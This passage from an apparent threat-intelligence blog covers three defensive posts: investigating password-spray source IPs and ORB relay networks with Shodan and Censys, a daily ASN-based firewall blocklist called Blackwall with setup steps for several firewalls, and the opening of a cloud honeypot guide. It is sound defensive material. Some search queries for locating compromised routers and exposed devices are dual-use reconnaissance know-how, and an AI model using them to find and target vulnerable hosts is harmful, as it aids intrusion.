principle, taking measures to limit damage and impact based on the assumption that a successful digital attack has already occurred or is imminent.</li> </ul> <p><br /></p> <p><strong>By shifting the focus from individual, fleeting IOCs to the broader, evolving patterns of ORB networks, and by employing the comprehensive scanning capabilities of tools like Shodan and Censys, defenders can enhance their ability to identify, categorize, and ultimately counter these advanced threats.</strong> This demands a mindset focused on continuous improvement and agility to stay ahead of sophisticated adversaries.</p> <p>When an analyst needs to investigate bulk data from an event like a password spraying attack, they can leverage internet search engines such as Shodan and Censys to gain crucial insights into the attacker’s infrastructure. Password spraying involves attackers using a single common password against multiple accounts to avoid account lockouts. Indicators of a password spraying attack can include a high volume of login activity over a brief period, a spike in failed login attempts, or logins from nonexistent accounts. The initial phase of an investigation often involves determining the IP addresses used in the attack.</p> <p>Here’s a step-by-step guide on how an analyst would apply bulk data from a password spray to an internet search engine like Shodan (and Censys as a complementary tool):</p> <h2 id="step-by-step-investigation-using-shodan-and-censys">Step-by-Step Investigation Using Shodan and Censys</h2> <p><br /></p> <p><strong>1. Identify Attacker IP Addresses from Password Spray Logs</strong> The first crucial step is to <strong>extract the IP addresses associated with the password spraying attempts</strong> from your organization’s logs, such as firewall logs, Microsoft Entra ID sign-in logs, or SIEM tools. These logs can also provide details like timestamps and user agent strings, which can further aid the investigation. For federated authentication, successful sign-ins are in Microsoft Entra ID, while failed sign-ins are in the Identity Provider (IDP) logs, such as AD FS logs. This is LARGE and can be difficult to do at scale, but iterating hour by hour and isolating spikes in the telemetry can assist in drilling down on likely ORB sprays.</p> <p><img src="https://github.com/user-attachments/assets/09d6cd30-304e-485f-a310-bb7c0a128f64" alt="image" /></p> <p><br /></p> <p><strong>2. Query IP Addresses in Shodan (and Censys)</strong> Once you have a list of suspicious IP addresses, you can use Shodan or Censys to gather information about the hosts.</p> <ul> <li><strong>Individual IP Lookup (Shodan):</strong> For single IPs, use the Shodan.host() method with your API key. For example: api.host(‘8.8.8.8’). You can also simply enter the IP into the Shodan.io search bar.</li> </ul> <p><br /></p> <p><img src="https://github.com/user-attachments/assets/c513de08-f2cd-4949-8bcc-109ca34b0841" alt="image" /></p> <p><br /></p> <ul> <li><strong>Bulk IP Lookups (Shodan):</strong> If you have a corporate API key, Shodan allows you to look up up to 100 IPs per request by providing a list of IPs to the Shodan.host() method.</li> </ul> <p><img src="https://github.com/user-attachments/assets/110525b2-b635-4db2-9a50-07bee41c906e" alt="image" /></p> <p><br /></p> <ul> <li><strong>Censys Search:</strong> Censys allows you to search for a single IP using ip 1.1.1.1 or by subnet using ip: 1.1.1.0/24. You can also use their web interface at search.censys.io.</li> </ul> <p><br /></p> <p><img src="https://github.com/user-attachments/assets/89c3896b-0032-4405-aa83-41080fed6d0b" alt="image" /></p> <p><br /></p> <p><strong>3. Analyze the Search Engine Output for Infrastructure Insights</strong> The data returned by Shodan and Censys can provide a detailed view of the attacker’s infrastructure.</p> <ul> <li> <p><strong>Open Ports and Services:</strong> Shodan’s output will include a list of <strong>open ports</strong> and data (banners) that provide <strong>details about the services</strong> running on those ports. Similarly, Censys collects data on open ports and services, allowing searches by services.service_name or services.port. This can reveal what kind of systems the attackers are using (e.g., web servers, databases, IoT devices).</p> </li> <li> <p><strong>Location and Autonomous System (ASN):</strong> Both Shodan and Censys provide <strong>geographic location</strong> (city, country, coordinates) and <strong>Autonomous System Number (ASN)</strong> information. Knowing the ASN can help identify the hosting provider or network range, allowing you to search for other related infrastructure.</p> </li> <li> <p><strong>Historical Data:</strong> Shodan allows you to retrieve a full history of an IP address by setting history=True in the Shodan.host() method, showing <strong>all banners ever seen for that IP</strong>. Censys also offers access to historical data with a paid license. This can help determine how long a device has been online or when a service was first exposed.</p> </li> <li> <p><strong>Operating Systems and Products:</strong> You can identify the <strong>operating system</strong> (os filter in Shodan, operating_system.product in Censys) or <strong>product/vendor</strong> (product in Shodan, services.software.product or services.software.vendor in Censys) running on the IP. This is useful for identifying known vulnerable software.</p> </li> <li> <p><strong>Vulnerabilities and Tags:</strong> Shodan can identify if an IP is <strong>vulnerable to a known exploit</strong> using the vuln filter (requires academic or business users). It also uses tags to identify specific device types like “ics” (industrial control systems). Censys uses labels for host scans, which can include terms like self-signed certificates or network.device. This information can indicate if the attacker is leveraging compromised IoT devices or cheap routers with poor security standards, which are common components of Operational Relay Box (ORB) networks.</p> </li> </ul> <p><strong>4. Refine Searches and Expand Investigation</strong> Based on initial findings, an analyst can refine their searches to uncover more about the attack infrastructure.</p> <ul> <li> <p><strong>Search by ASN:</strong> If an IP belongs to a particular ASN, you can search for asn:AS[number] in Shodan or autonomous_system.asn:[number] in Censys to find <strong>all devices on that ASN</strong>. This can reveal if the attacker is using a network segment heavily populated by compromised devices or VPS.</p> </li> <li> <p><strong>Combine Filters:</strong> Both search engines allow combining multiple filters. For example, asn:AS14061 product:MySQL in Shodan to find MySQL servers within a specific ASN, or services.service_name: MODBUS and location.country: Germany in Censys to find services in a specific location.</p> </li> <li><strong>Look for Compromised Device Indicators:</strong> <ul> <li><strong>Censys:</strong> Queries like services.service_name: MIKROTIK_BW and “HACKED” can identify compromised MikroTik Routers.</li> <li><strong>Shodan:</strong> Search for screenshot.label:webcam or screenshot.label:ics to find publicly available webcams or industrial control systems. The presence of passwordless Pi-Holes can also be found via Shodan.</li> </ul> </li> <li><strong>Monitor Networks (Shodan Monitor):</strong> For continuous monitoring of your own network or specific IP ranges, <strong>Shodan Monitor</strong> can be used to set up notifications for detected security vulnerabilities, open ports, and notable IPs.</li> </ul> <p><br /></p> <p><strong>5. Understand Implications for ORB Networks</strong> Many threat actors, particularly those attributed to China, are increasingly using <strong>Operational Relay Box (ORB) networks</strong>. These networks are composed of Virtual Private Server (VPS) hosts and compromised Internet of Things (IoT) devices, creating a decentralized “mesh” network for anonymized communication.</p> <ul> <li> <p><strong>Decentralization:</strong> Shodan and Censys can help identify the broad distribution of infrastructure across different regions and ISPs. The direct communication between geographically distant, similar devices (e.g., SOHO routers in Norway and Kenya) might appear unusual and could indicate an ORB network.</p> </li> <li> <p><strong>Ephemeral Nature:</strong> ORB networks rapidly cycle IP addresses (sometimes as frequently as every 31 days) to evade detection, making traditional Indicators of Compromise (IOCs) less effective. The ability to check historical data on Shodan or Censys can help analysts understand the lifespan of observed IPs.</p> </li> <li> <p><strong>Hiding in the Noise:</strong> ORB networks often route “normal” traffic alongside malicious traffic to obscure their activities. Shodan and Censys data can help analysts distinguish between legitimate and suspicious activity by providing context on the services and behaviors observed on an IP.</p> </li> <li> <p><strong>Collateral Damage Risk:</strong> A significant portion of ORB networks consists of compromised residential or commercial IPs. Blocking these IPs identified via Shodan/Censys carries a risk of blocking legitimate users.</p> </li> </ul> <p><br /></p> <p><strong>6. Integrate Findings into Proactive Defense Strategies</strong> The intelligence gathered from Shodan and Censys can inform broader defense strategies:</p> <ul> <li> <p><strong>Active Hunting:</strong> Use insights from these search engines to proactively scan for indicators of compromise (IoCs) associated with ORB networks, such as unusual communication paths or unique service characteristics.</p> </li> <li> <p><strong>Behavioral Analytics:</strong> Analyze network activity for anomalies like connections to unfamiliar IP addresses or irregular traffic patterns, which Shodan/Censys can help identify as part of the attacker’s infrastructure.</p> </li> <li> <p><strong>Network Traffic Analysis:</strong> Look for unusual traffic patterns (e.g., lateral movement, high outbound traffic, data relayed through multiple geographies) that correlate with the characteristics of ORB networks identified through Shodan/Censys.</p> </li> <li> <p><strong>Threat Intelligence:</strong> Integrate data from Shodan/Censys with threat intelligence feeds to identify known Command and Control (C2) infrastructures or compromised devices acting as relay points. Team Cymru, for instance, tags ORB networks within its Pure Signal™ Scout and Recon platforms for easier identification and attribution.</p> </li> <li> <p><strong>Zero Trust Architecture:</strong> Implement strict access controls, multi-factor authentication (MFA), and continuous network monitoring to limit damage, as identified compromised devices can be isolated through microsegmentation.</p> </li> </ul> <p>By systematically using these powerful internet search engines, analysts can move beyond simply reacting to password spray attacks to proactively understanding and defending against the sophisticated infrastructure, like ORB networks, that threat actors employ.</p> <p><img src="http://canarytokens.com/tags/t4o2id0o0r9wopll6y4t6ndoo/contact.php" style="display: none;" /></p>
  119. Automating the Simple Blocks with Blackwall

    Tue, 01 Jul 2025 00:00:00 -0000

    Automating ASN-Based Threat Intelligence with Blackwall
    <h1 id="automating-asn-based-threat-intelligence-with-blackwall">Automating ASN-Based Threat Intelligence with Blackwall</h1> <p>Not every problem in cybersecurity needs to be solved with machine learning or a <a href="https://www.trolleyesecurity.com/articles-five-ways-to-simplify-your-security-stack/#:~:text=A%20complex%20security%20stack%20can,vulnerabilities%20rather%20than%20mitigating%20them.">15-layer detection stack</a>. Sometimes, effective defense begins with the fundamentals. In this case, that means simple, structural blockades, especially when it comes to controlling external exposure. I’ve also seen enough shops attempt to maintain massive, in many times manually curated IP blocklists. These are done piecemeal and get out of control very quickly, and are generally reactive. It’s not uncommon to intake information about an event that has already occurred and a SOC will block indicators that have already been torn down or rotated. In many cases, it can be <a href="https://www.recordedfuture.com/threat-intelligence-101/legal-ethical-considerations/security-theater">security theater</a> and creates an illusion of control.</p> <p><a href="https://github.com/CTI-Buddy/BLACKWALL"><strong>Blackwall</strong></a> is a small project that mostly solves a headache for myself, but I thought it might be useful as a free tool for the wider community: <strong>block what doesn’t need to talk to you, and just be done with it.</strong> I think there’s an assumption that most mature shops are already doing something like this, but this problem seemed common enough to me that I’d just make my own humble offering that solves the problem conservatively but effective enough that it might help whomever might be nodding along to that first paragraph.</p> <p>Sometimes the simplest defenses are the most effective, and that’s the idea behind building a lightweight, automated blocklist that merges known abusive IP ranges with dynamically resolved IPs tied to low-reputation ASNs. Many of the worst actors on the internet operate from network infrastructure that’s already well-known to threat researchers: entire IP ranges used for malware staging, spam, C2, or phishing kits. In many cases, these hostile networks have a consistent track record of abuse, questionable ownership, and minimal action in response to takedown requests.</p> <p>The result is a rolling list of suspect IP space, refreshed daily, that can be used with firewalls, proxies, or SIEM enrichment pipelines. It doesn’t try to do everything. It’s just a fast way to say “no” to the obvious. And yes - it is a <a href="https://cyberpunk.fandom.com/wiki/Blackwall">Cyberpunk 2077 reference</a>. <br /></p> <h2 id="why-block-by-asn">Why Block by ASN?</h2> <p><br /></p> <p><a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/">Autonomous Systems (ASNs)</a> are large blocks of IP ranges registered to specific organizations. Some ASNs are repeatedly abused for bulletproof hosting, phishing infrastructure, or botnet C2 staging. While not surgical, blocking entire ASNs that have no legitimate business interacting with your infrastructure can reduce attack surface significantly. Add in the additional variable of analysis of what these ASNs are typically used for over time, and you can shut the door to commonly used infrastructure for attacks that your legitimate users are most likely not going to be using.</p> <p><img src="https://github.com/user-attachments/assets/f41bd681-8662-4aae-9e0a-f401d23c1114" alt="image" /></p> <p>While most ASNs belong to reputable providers, others serve as havens for <strong>bulletproof hosting</strong>, <strong>botnet operations</strong>, or <strong>persistent phishing infrastructure</strong>. Blocking by ASN is a definitely a <strong>coarse control</strong>, but it’s often justified when entire networks are designed to facilitate abuse. Essentially, there are a number of ASNs that meet two critical requirements to justify a widescale block: 1) they are demonstrated to exist primarily for less than reputable activity and 2) you don’t have much need for their traffic, inbound or outbound. If you never expect to receive a request from a sketchy VPS provider in Moldova or a hosting company in Indonesia that’s been tied to a half-dozen ransomware campaigns, it’s a pretty safe bet to just block them.</p> <h3 id="the-dark-side-of-vps-infrastructure">The Dark Side of VPS Infrastructure</h3> <p><br /> <a href="https://aws.amazon.com/what-is/vps/">Virtual Private Server (VPS)</a> providers offer cheap, fast, and globally distributed compute that powers everything from hobby projects to enterprise SaaS platforms. But that same accessibility and scale make VPS services a hotbed for malicious activity, especially among low-cost or offshore providers with minimal oversight. These can also be located in places that are going to ignore any takedown requests, abuse reports, or subpoenas.</p> <p>Unlike major cloud platforms (AWS, GCP, Azure), many VPS hosts operate with <strong>bare-minimum</strong> <a href="https://www.okta.com/identity-101/kyc/"><strong>KYC (Know Your Customer)</strong></a> <strong>processes</strong>, weak abuse enforcement, and rapid provisioning. For a few dollars, an attacker can spin up an instance, deploy a phishing kit, mass-scanning exploiter or malware payload, exfiltrate stolen data, and tear it all down, sometimes in under an hour. These operations often cycle across the same <strong>repeat-offender ASNs</strong>, many of which are tied to budget VPS companies that rely on anonymity and high turnover.</p> <p>Some of the most commonly abused ASNs belong to providers offering “<strong>bulletproof hosting</strong>”, or infrastructure explicitly marketed as resilient to takedown requests, law enforcement pressure, or abuse complaints. Others may not advertise that intent but end up effectively serving the same role due to inaction or volume. <br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <h3 id="bulletproof-hosting-infrastructure-for-the-unlawful">Bulletproof Hosting: Infrastructure for the Unlawful</h3> <p><br /> While many VPS providers end up facilitating abuse through inaction or loose policies, <a href="https://www.sentinelone.com/cybersecurity-101/threat-intelligence/bulletproof-hosting/"><strong>bulletproof hosting (BPH)</strong></a> takes it a step further, in some cases actively marketing to criminals by offering infrastructure intentionally designed to withstand takedowns, legal complaints, and abuse reports.</p> <p>A bulletproof host will often ignore DMCA notices, delay or deflect law enforcement inquiries, and provide obfuscation services like <strong>WHOIS privacy</strong><a href="https://icannwiki.org/False_Whois"><strong>, falsified registration data</strong></a><strong>,</strong> obfuscated payment flows <strong>and offshore jurisdictions</strong> to shield both their customers and themselves.</p> <p>Many bulletproof hosts operate out of countries with weak or uninterested law enforcement, such as parts of Eastern Europe, Central Asia, or the Middle East. They often rebrand frequently, swap out netranges or operate through shell companies to avoid blacklisting, which is one reason why <strong>the ASN itself becomes a more stable target than any individual IP or domain</strong>. <br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <h3 id="why-blackwall-targets-these-networks">Why Blackwall Targets These Networks</h3> <p><br /> Many of the ASNs targeted by Blackwall belong to a familiar category: <a href="https://www.akamai.com/blog/security/determining-malicious-probabilities-through-asns">low-reputation VPS providers and bulletproof hosting operations</a> that serve as the internet’s most reliable sources of malicious infrastructure. While technically distinct, the line between the two is increasingly blurred. Bulletproof hosts often resell capacity from permissive VPS platforms, and many VPS providers drift into bulletproof territory through simple inaction.</p> <p>From a defensive perspective, the strategy is simple: if your organization never needs to hear from a shady Romanian VPS host or a throwaway server in Kazakhstan, why let them try? Blackwall leverages this principle by treating entire <a href="https://www.excedo.se/en/blog-articles/how-cybercriminals-are-abusing-autonomous-system-numbers-asn-for-bulletproof-hosting">abuse-heavy ASNs</a> as suspect and preemptively excluding them from the equation.</p> <p>By regularly resolving ASN IP ranges and layering in trusted feeds like <a href="https://www.spamhaus.org/blocklists/do-not-route-or-peer/">Spamhaus DROP</a>, Blackwall gives defenders a fast, low-friction way to block known repeat offenders. It doesn’t aim to detect every attacker or attribute every campaign, but rather aims to reduce surface area, cut out noise, and free up analyst time for other telemetry.</p> <p><img src="https://github.com/user-attachments/assets/3b1a7bb5-b53e-4f7a-bf13-af53024b2f07" alt="image" /></p> <h3 id="a-note-on-other-routes-evasion-via-residential-and-orb-networks">A Note on Other Routes: Evasion via Residential and ORB Networks</h3> <p><br /> While many malicious campaigns still rely on predictable infrastructure, more sophisticated actors are taking a different path. Rather than staging attacks from noisy, abuse-heavy networks that are easy to block, they’re increasingly operating through <strong>residential proxy services and</strong> <a href="https://www.team-cymru.com/post/an-introduction-to-operational-relay-box-orb-networks-unpatched-forgotten-and-obscured"><strong>“ORB” (Operational Relay Box) networks</strong></a> designed to make malicious traffic appear indistinguishable from everyday users.</p> <p><a href="https://nordvpn.com/blog/residential-proxies/"><strong>Residential proxy networks</strong></a> (like those sold by services such as Bright Data, ProxyRack, or even malware-powered botnets like <a href="https://krebsonsecurity.com/2022/07/911-proxy-service-implodes-after-disclosing-breach/">911.re before its takedown</a>) allow threat actors to route traffic through the IP addresses of unsuspecting home users. These IPs often belong to <strong>major ISPs in the U.S., Europe, and Asia</strong>, and show up in logs as <strong>legitimate consumer traffic</strong>. From a defender’s perspective, this makes blocking extremely difficult. For example, you’re not looking at a shady data center in Romania; you’re looking at a Comcast customer in Nebraska.</p> <p><img src="https://github.com/user-attachments/assets/fc7f19e4-c561-42d8-b705-7c8a2ceb5741" alt="image" /></p> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks"><strong>ORB (Operational Relay Box) networks</strong></a> are collections of compromised or co-opted devices (often home routers, IoT hardware, or poorly secured servers) that are used by threat actors as <strong>intermediary relay nodes</strong>. These relays help obscure the origin of malicious activity by forwarding traffic through devices that appear <strong>benign and geographically diverse</strong>.</p> <p><img src="https://github.com/user-attachments/assets/131b42a9-15eb-4fe0-aeda-593734756327" alt="image" /></p> <p>The result is that some threat actors have gone from renting cheap VPS boxes to operating like they’re behind a <strong>full CDN of hijacked or leased residential IP space</strong>. It’s more expensive and more complex, but also far more effective at bypassing traditional IP-based filtering. <br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <h2 id="what-this-means-for-blackwall">What This Means for Blackwall</h2> <p><br /> Blackwall’s strength lies in eliminating the <strong>predictable</strong>, <strong>recycled</strong>, and <strong>structurally abusive</strong> IP ranges. These are ranges known to many analysts, but lack a persistent and repeatable way to deny it at scale. This does not target residential proxies or ORB networks because it simply isn’t going to work. It’s not designed to detect adversaries <strong>masquerading as your customers</strong>, and you’re going to run into issues <a href="https://danaepp.com/evade-ip-blocking-by-using-residential-proxies">trying to prevent that at scale</a>. Instead, the goal is to <strong>narrow the field</strong>. If you can confidently block the loud infrastructure, you can better focus your detection and response efforts on the quiet, deceptive ones: the residential proxy logins, the anomalous Tor traffic, the sudden surge of cloud activity in your MFA logs.</p> <h2 id="paid-solutions-that-are-better-than-this">Paid Solutions That Are Better Than This</h2> <p><br /> Blackwall is intentionally simple: it blocks what’s obviously bad, using public data and a curated ASN list. It’s effective in <strong>reducing noise and risk</strong> in environments where resources are limited or bespoke solutions are preferred. But when it comes to depth, context, and adaptability, there are commercial tools that go much further. Blackwall isn’t here to compete with those tools. It’s here to augment your existing defenses with something transparent, auditable, lightweight and free. In highly locked-down environments, or places where vendors aren’t an option, it gives defenders a fast, local, and autonomous option for reducing exposure to well-known infrastructure abuse.</p> <p>If you’re already using a threat intel platform or commercial IP reputation feed, think of Blackwall as <strong>the low floor, not the ceiling</strong>, i.e. a good place to start, but not where you stop. Paid tools that are dedicated to this concept that I like include <a href="https://www.greynoise.io/">GreyNoise</a> and <a href="https://spur.us/">Spur</a>. You can definitely implement a similar mass-block using their telemetry that’s much more targeted and elegant than this. They also cost money, obviously.. so the intent here is to do something “good enough for free” by just shutting the door on ASNs you don’t need to bother with.</p> <h2 id="so-whats-the-point">So What’s the Point?</h2> <p><br /> Really, the headache I was primarily looking to solve for myself was that ASN net-ranges change around <a href="https://stackoverflow.com/questions/50955013/for-how-long-does-a-given-asn-stay-valid">MUCH more frequently than I would have initially assumed</a>. Generally speaking, the infrastructure behind abusive ASNs isn’t static and tends to be highly fluid. Many of the networks Blackwall targets frequently shift their advertised IP space by buying, selling, or temporarily leasing new net ranges semi-frequently. This churn can happen daily, which makes any static list quickly outdated. The best way to keep up is to track the infrastructure itself, not just one-time indicators.</p> <p>After running this daily for a little over two weeks, I had between 10 and 15 ASNs identified for daily pulls. Within that dataset, the ASNs in question on average swap out between 1-5 net-ranges daily, typically smaller /24s but as large as /18s. That’s frequent enough to render a static list <a href="https://blog.cloudflare.com/consequences-of-ip-blocking/">pretty significantly degraded</a> by the end of the week. And that’s basically the annoyance I sought to sidestep here. Blackwall is built to be simple, repeatable, and automated. At its core, it’s a daily script that takes a preset of targeted ASNs pulls fresh IP ranges in CIDR format. It then merges that list with the well-known <a href="https://www.spamhaus.org/blocklists/do-not-route-or-peer/">Spamhaus DROP list</a> that does similar tracking. The goal is to keep an up-to-date snapshot of the IP infrastructure most commonly abused by threat actors, with a focus on reducing inbound exposure from networks that serve no legitimate purpose to most environments.</p> <h2 id="technical-details--how-this-works">Technical Details / How This Works</h2> <p><br /> Each day at 12:00 UTC, Blackwall performs a series of operations:</p> <p>It begins by reaching out to a curated set of Autonomous System Numbers (ASNs) known for their persistent association with malicious activity. Using a public feed service powered by <a href="https://www.ripe.net/">RIPE NCC</a>, Blackwall resolves those ASNs to their current advertised IP netblocks. Since IP allocations can change frequently, this step ensures the list always reflects the most accurate view of what infrastructure is actively being used.</p> <p><img src="https://github.com/user-attachments/assets/e85d5650-d9a3-491d-8fe6-ca352417f596" alt="image" /></p> <p>Alongside this, Blackwall pulls in the <a href="https://www.spamhaus.org/blocklists/do-not-route-or-peer/"><strong>Spamhaus Don’t Route or Peer (DROP) list</strong></a>, a well-established feed of known bad IP ranges. These are combined with the ASN-derived data into a single blocklist file, updated daily and pushed to a GitHub repository. The result is a fresh, consolidated list of IP networks that organizations can use in firewalls, proxy configurations, or enrichment pipelines. There is almost certainly going to be overlap between the manually curated Blackwall list and DROP. That’s fine, it won’t break anything.</p> <p>Blackwall also maintains a <a href="https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/refs/heads/main/ASN_list.txt">second file that logs which ASNs are being monitored</a>, along with their organizational names, pulled dynamically from the <a href="https://stat.ripe.net/docs/data-api/ripestat-data-api">RIPEstat API</a>. This helps defenders understand the scope of what’s being blocked, and keeps the project transparent and auditable. If the list of ASNs changes, Blackwall automatically rebuilds that metadata; otherwise, it just refreshes the IP data.</p> <p>From here, a shop would need to implement Blackwall into its firewall solution, most commonly through what’s known as an <a href="https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/policy/use-an-external-dynamic-list-in-policy/external-dynamic-list">External Dynamic List (EDL)</a>. From there, you’re done. The firewall does the rest, refreshing the ASN CIDR ranges as Blackwall updates daily.</p> <p>By design, Blackwall avoids complexity. There’s no agent, no integration overhead, and no learning curve, just predictable, structural defense against infrastructure that doesn’t deserve to be trusted. Plug it into a border firewall or proxy and be done with it.</p> <h2 id="how-to-use-it">How to Use It</h2> <p><br /> I have first-hand experience with a few of these, but referencing the technical docs for others suggests that most of these solutions will support an External Dynamic List (EDL).. These should work, but as always – test first.</p> <p><strong>🟧</strong> <a href="https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-admin/policy/use-an-external-dynamic-list-in-policy/configure-the-firewall-to-access-an-external-dynamic-list"><strong>Palo Alto Networks (PAN-OS)</strong></a></p> <ol> <li>Navigate to Objects → External Dynamic Lists</li> <li>Click “Add” → <ul> <li>Name: Blackwall-IP-Blocklist</li> <li>Type: IP List</li> <li>Source: <a href="https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt">https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt</a></li> </ul> </li> <li>Create a Security Policy blocking traffic from this EDL.</li> <li>Commit and deploy.</li> </ol> <p>✅ <em>EDL refreshes automatically; use in firewall rules directly.</em></p> <p><br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <p><strong>🟥</strong> <a href="https://docs.fortinet.com/document/fortigate/7.6.3/administration-guide/379433/configuring-a-threat-feed"><strong>Fortinet FortiGate</strong></a></p> <ol> <li>Go to Objects → Threat Feeds → IP Address</li> <li>Add a new feed: <ul> <li>Name: BlackwallFeed</li> <li>URL: <a href="https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt">https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt</a></li> </ul> </li> <li>Go to Policy &amp; Objects → Addresses, add a new address: • Type: External IP List • Link to Feed: BlackwallFeed</li> <li>Use that address object in a firewall policy → Action: Block.</li> </ol> <p>✅ <em>Refreshes on schedule; native feed support.</em></p> <p><br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <p><strong>🟦</strong> <a href="https://www.cisco.com/c/en/us/td/docs/security/firepower/610/configuration/guide/fpmc-config-guide-v61/security_intelligence_blacklisting.pdf"><strong>Cisco Firepower / FMC</strong></a></p> <ol> <li>Navigate to Objects → Object Management → Security Intelligence → Network Lists and Feeds</li> <li>Add new feed: <ul> <li>Name: Blackwall-IP-Feed</li> <li>URL: <a href="https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt">https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt</a></li> <li>Type: IP Feed</li> </ul> </li> <li>Apply in Access Control Policy → Security Intelligence tab.</li> <li>Select Block action.</li> </ol> <p>⚠️ <em>Ensure HTTPS feed accessibility from FMC.</em></p> <p><br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <p><strong>🟩</strong> <a href="https://edepree.com/2021/03/07/pfsense-dynamic-blocking-of-threat-feeds.html"><strong>pfSense (with pfBlockerNG)</strong></a></p> <ol> <li>Install pfBlockerNG via package manager</li> <li>Go to Feeds → IPv4</li> <li>Add custom list: <ul> <li>Name: Blackwall</li> <li>URL: <a href="https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt">https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt</a></li> </ul> </li> <li>Set action: Deny Both (inbound and outbound)</li> <li>Apply changes and reload.</li> </ol> <p><br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <p><strong>🟨</strong> <a href="https://docs.opnsense.org/manual/aliases.html"><strong>OPNsense</strong></a></p> <ol> <li>Use built-in Firewall → Aliases</li> <li>Add new alias: <ul> <li>Type: URL Table (IPs)</li> <li>Name: blackwall_blocklist</li> <li>URL: <a href="https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt">https://raw.githubusercontent.com/CTI-Buddy/BLACKWALL/main/THEBLACKWALL.txt</a></li> <li>Update Frequency: Daily</li> </ul> </li> <li>Use in firewall rule (e.g., Block if Destination matches alias).</li> <li>Apply changes.</li> </ol> <p>✅ <em>No need for plugins if using native alias support.</em></p> <p><br /> <strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><strong>__</strong><em>__</em> <br /></p> <h2 id="wrap-up">Wrap-Up</h2> <p><br /> Blackwall isn’t meant to be a silver bullet, and as I mentioned – it’s mostly to solve a personal annoyance of mine. It is, however, a pragmatic, low-friction tool for shrinking your attack surface by targeting infrastructure that consistently enables malicious activity. In a threat landscape dominated by noise and velocity, it offers defenders a way to decisively filter out known-abuse networks using open data and repeat-offender patterns. Whether deployed at the edge, fed into enrichment pipelines, or used to harden internal services, Blackwall gives teams a simple but strategic advantage: it stops the traffic that doesn’t need to be there, so you can focus on what does.</p> <p><img src="http://canarytokens.com/terms/static/articles/0s6izgrh745q7mhyff27ergl7/contact.php" style="display: none;" /></p>
  120. East, Fast, Cheap Deception in the Cloud

    Sun, 22 Jun 2025 00:00:00 -0000

    Why a Cloud Honeypot?
    <h1 id="why-a-cloud-honeypot">Why a Cloud Honeypot?</h1> <p><br /> In an era where threat actors increasingly target cloud infrastructure, many organizations overlook the fact that they already possess the tools to proactively monitor malicious activity, without purchasing expensive commercial detection technology solutions. This blog post walks through how to build a lightweight honeypot and/or honeynet using common cloud services (like Azure or AWS) coupled with an <a href="https://developer.okta.com/docs/concepts/identity-providers/">external IdP</a>, making use of resources you probably already have access to. Inspired by previous implementations by <a href="https://coltonhicks.medium.com/heres-how-i-used-azure-cloud-to-build-a-honeynet-detect-live-threats-and-respond-to-soc-9c4eec7c05d5">Colton Hicks</a> and <a href="https://medium.com/@stevenrim/building-a-cloud-honeynet-soc-in-azure-980f84fb5147">9purp0se</a>, this guide provides a modern, no-frills approach to capturing attacker behavior and generating actionable SOC telemetry, all while keeping costs and complexity to a minimum.</p> <p>As someone who strongly believes in relevance as the cornerstone of good threat intelligence, I’ve always felt that defenders miss a critical opportunity when they overlook their own telemetry. It’s one thing to consume third-party IOCs from feeds or vendors, but quite another to observe firsthand what adversaries are probing for in your own cloud space. That kind of data isn’t just timely, but it’s also obviously tailored to your own threat model. By deploying a honeypot or a lightweight honeynet in infrastructure you already own or manage, you can generate relevant, high-signal telemetry that reflects the real interests and tactics of threat actors targeting your sector, tech stack, or geography. It’s one of the most honest, grounded ways to inform detection engineering and drive SOC maturity.</p> <p>Yet, as I began mapping out the architecture, I kept running into the same trade off: the safest designs, those in completely separate cloud tenants, force you to abandon your corporate domain, while the most realistic designs, those living inside your main tenant, introduce unacceptable risk if a misconfiguration lets an attacker pivot. The solution that finally threads that needle is to front the entire deception layer with an <strong>external identity provider</strong> such as <a href="https://www.okta.com/">Okta</a>. A standalone Okta tenant lets you issue convincingly real looking <code class="language-plaintext highlighter-rouge">@yourcorp.com</code> credentials without ever touching the production directory, then route any “successful” logins into a fully sandboxed cloud environment. In other words, you retain brand realism for the attacker and keep the blast radius at arm’s length for the defender, making external IdPs the linchpin of the approach outlined in the rest of this write up. <br /></p> <h2 id="what-youll-need-to-get-started">What You’ll Need to Get Started</h2> <p><br /></p> <p>Standing up a cloud deception environment doesn’t necessarily require spinning up virtual machines or purchasing enterprise logging tools (although you’ll find yourself wanting to do this after you start). In fact, with a bit of creative configuration, you can build a convincing honeynet using free-tier services and publicly available tooling. At its core, this approach requires only a standalone identity provider like <a href="https://developer.okta.com/"><strong>Okta Developer Edition</strong></a>, a few <strong>static</strong> <a href="https://dev.to/progrium/apptron-demo-zero-config-html5-native-apps-29f8"><strong>HTML decoy apps</strong></a> hosted on platforms like <strong>Azure Static Web Apps</strong> or <strong>Cloudflare Pages</strong>, and a 